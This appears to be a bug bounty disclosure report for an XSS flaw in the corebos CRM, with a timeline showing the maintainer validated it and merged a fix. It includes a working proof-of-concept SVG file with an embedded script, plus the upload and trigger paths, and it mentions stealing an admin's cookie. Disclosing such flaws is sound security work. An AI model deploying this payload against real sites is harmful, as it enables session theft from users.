Cross-site Scripting (XSS) - Reflected in tsolucio/corebos

Valid

Reported on

Oct 18th 2021


Description

Reflected XSS via upload of malicious SVG file.

Proof of Concep

1: Upload SVG file via /corebos/index.php?module=Documents&action=DetailView&viewname=0&start=&record=8460&

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

2: Trigger the reflected XSS by visiting the malicious SVG file stored in the storage folder (number may be different)- /corebos/storage/2021/October/week3/8464_payload.svg

Impact

This vulnerability is capable of tricking the admin user to visit the malicious SVG file causing a reflected XSS and stealing the cookie. Requires ability to upload files.

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. a month ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. a month ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. a month ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. a month ago
Joe Bordes validated this vulnerability a month ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes confirmed that a fix has been merged on b44a52 a month ago
Joe Bordes has been awarded the fix bounty